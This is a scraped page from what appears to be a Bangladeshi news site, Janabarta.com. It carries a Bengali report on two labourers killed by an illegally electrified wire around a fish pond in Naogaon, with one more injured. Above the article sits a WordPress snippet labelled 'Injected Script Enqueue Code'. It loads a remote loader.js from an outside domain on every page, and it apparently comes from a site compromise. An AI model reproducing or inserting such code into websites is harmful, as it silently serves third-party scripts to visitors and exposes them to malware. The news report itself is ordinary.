// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site নওগাঁয় বিদ্যুতের তারে জড়িয়ে দুই শ্রমিকের মৃত্যু - Janabarta.com

নওগাঁয় বিদ্যুতের তারে জড়িয়ে দুই শ্রমিকের মৃত্যু

নওগাঁ প্রতিনিধি: অবৈধভাবে পুকুরের চারিদিকে গুনার তারে বিদ্যুৎ সংযোগ দিয়ে রাখার তারে জড়িয়ে নওগাঁর রাণীনগর উপজেলার বিশিয়া গ্রামে দুই শ্রমিকের মৃত্যু হয়েছে। ওই ঘটনায় আরও এক শ্রমিক গুরুতর আহত হয়েছেন। নিহত শ্রমিকরা হলেন- বিশিয়া গ্রামের আবুল প্রামাণিকের ছেলে জাহিদুল ইসলাম (৩০) এবং একই এলাকার মৃত খালেকের ছেলে আনোয়ার হোসেন (৩১)। এছাড়াও আনোয়ারের ছোট ভাই হোসেন আলী (২৭) গুরুতর আহত হয়ে আদমদীঘি উপজেলা স্বাস্থ্য কমপ্লেক্সে চিকিৎসাধীন রয়েছেন। সোমবার সকালে বিশিয়া গ্রামের অভয়ের পুকুর পাড়ে এই ঘটনা ঘটে।

স্থানীয়রা জানায়, বিশিয়া গ্রামের অভয়ের পুকুরে মাছ রক্ষার্থে পাড়ের চারদিকে রাতে অবৈধ গুনার তারযোগে বিদ্যুৎ সংযোগ দিয়ে রাখেল সকালে শ্রমিক জাহিদুল, আনোয়ার ও হোসেন ওই পুকুর পাড়ের জমিতে ধান কাটার জন্য মাঠে যাচ্ছিলেন। হঠাৎ জাহিদুল বিদ্যুতের তারের সঙ্গে জড়িয়ে পড়েন। এসময় জাহিদুলকে বাঁচানোর জন্য আনোয়ার ও হোসেন এগিয়ে এলে তারাও বিদ্যুতের তারে জড়িয়ে পড়েন।

এতে ঘটনাস্থলেই জাহিদুল ও আনোয়ার মারা যান। পরে স্থানীয়রা হোসেনকে গুরুতর অবস্থায় উদ্ধার করে আদমদীঘি উপজেলা স্বাস্থ্য কমপ্লেক্সে ভর্তি করেন। এঘটনার পর মৃত অভয়ের ছেলেরা অবৈধ বিদ্যুৎ সংযোগ দেওয়ার তারগুলি লুকিয়ে ফেলে। গ্রামবাসীরা অবৈধভাবে পুকুরপাড়ে বিদ্যুৎ সংযোগ দিয়ে রাখা ও দুই শ্রমিকের মৃত্যুর বিচার দাবিতে বিক্ষোভ করেছেন।

রাণীনগর পল্লী বিদ্যুৎ সমিতির এজিএম সাইদী সবুজ খাঁন জানান, ওই ঘটনার পরে বিদ্যুতের মিটারটি জব্দ করা হয়েছে। এছাড়াও তাঁদের বিরুদ্ধে বিভাগীয় মামলা দায়ের করে আইনগত ব্যবস্থা গ্রহণ করা হবে।

রাণীনগর থানার ওসি জহুরুল হক ঘটনার সত্যতা নিশ্চিত করে বলেন, নিহতের পরিবারের পক্ষ থেকে অভিযোগ পেলে তদন্ত সাপেক্ষে আইনী ব্যবস্থা নেওয়া হবে।